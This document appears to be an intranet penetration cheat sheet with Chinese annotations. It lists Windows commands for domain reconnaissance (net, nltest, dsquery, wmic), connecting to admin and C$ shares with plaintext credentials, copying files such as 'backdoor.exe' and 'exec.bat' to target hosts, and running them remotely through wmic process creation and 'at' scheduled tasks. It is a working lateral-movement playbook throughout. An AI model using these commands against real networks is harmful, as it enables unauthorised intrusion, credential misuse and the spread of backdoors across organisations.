net time /domain net group "domain admins" /domain net group "domain controllers" /domain net user administrator /domain nltest /domain_trusts 获取域信任关系 nltest /dclist: net share net view \\domainip net view /domain 查看域/工作组列表 net view /domain:secwing 查看secwing域中 计算机列表 net config Workstation 查询机器属于哪个域 netstat -ano |findstr net accouts 查看本地密码策略
set 查看环境变量 nbtstat -A ip netbiso查询 whoami /all qwinsta //查看登录情况 query user //查看管理员最近登陆时间 nltest /domain_trusts //获取域信任信息
taskkill /f /im tasklist /svc 查看进程 tasklist /S ip /U domain\username /P /V //查看远程计算机进程列 tracert IP //路由跟踪
net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] password /user:username@domain
copy putty.exe \\192.168.0.100\admin$ net time \\192.168.0.100 at \\192.168.0.100 19:45 putty.exe net use Z: \\192.168.0.100\c$ 将靶机c盘映射到本地 dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ net use * \\192.168.0.100 /del
wmic qfe get hotfixid //查看已安装过得补丁,这个很实用 wmic qfe list full /format:htable > hotfixes.htm //详细的补丁安装 wmic qfe //查询补丁信息以及微软提供的下载地址 ping hostname(主机名) //显示该机器名的IP wmic share get name,path //查看SMB指向的路径 wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置 wmic service list brief //查看进程服务 wmic process list brief //查看进程 wmic startup list brief //查看启动程序信息 wmic product list brief //查看安装程序和版本信息(漏洞利用线索) wmic startup list full //识别开机启动的程序 wmic process where(description="mysqld.exe") >> mysql.log //获取软件安装路径
wmic /node:ip /user: /p pwd process call create c:\backdoor.exe
wmic /node /user: /password: process wher e name="cmd.exe" cll terminate
wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX process call create "cmd.exe /c ipconfig>c:\result.txt"
wmic /node /user /password process where name="cmd.exe" get CommandLine
计划任务
AT/Schtasks
AT命令(win server2012已遗弃)
1 2 3 4 5 6 7 8 9 10
建立net use 连接 net use \\192.168.1.100\c$ 1qaz@WSX /user domain\user 复制bat文件到远程计算机 copy exec.bat \\192.168.1.100\c$\windows\debug\exec.bat 查看远程计算机时间 net time \\192.168.1.100 新建远程计划任务 at \\192.168.1.100 21.52 c:\windows\temp\exec.bat 查看远程计划任务列表 at \\192.168.1.100
dsquery.exe user -limit 0#查询用户对象信息 dsquery.exe group -limit 0 #查询组对象信息 dsquery.exe ou -limit 0#查询OU对象信息 dsquery user domainroot -limit 65535 && net user /domain //列出该域内所有用户名 dsquery server -domain supre.com | dsget server -dnsname -site //搜索域内所有域控制器并显示他们的DNS主机名和站点名称 dsquery contact //寻找目录中的联系人 dsquery subnet //列出该域内网段划分 dsquery group && net group /domain //列出该域内分组 dsquery ou //列出该域内组织单位 dsquery server && net time /domain //列出该域内域控制器 dsquery site -o rdn //搜索域中所有站点名称 dsquery group dc=GOD,dc=org |more 搜索在dc=god,dc=org域中的所有组 dsquery.exe computer #查找目标中的计算机 dsquery.exe site #查找目录中的组织单位 dsquery.exe server #查找目录中的AD DC/LDS 实例
LogParser.exe -i:EVT -o csv "SELECT distinct TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) as SOURCE_IP FROM C:\*.evtx" > C:\log.csv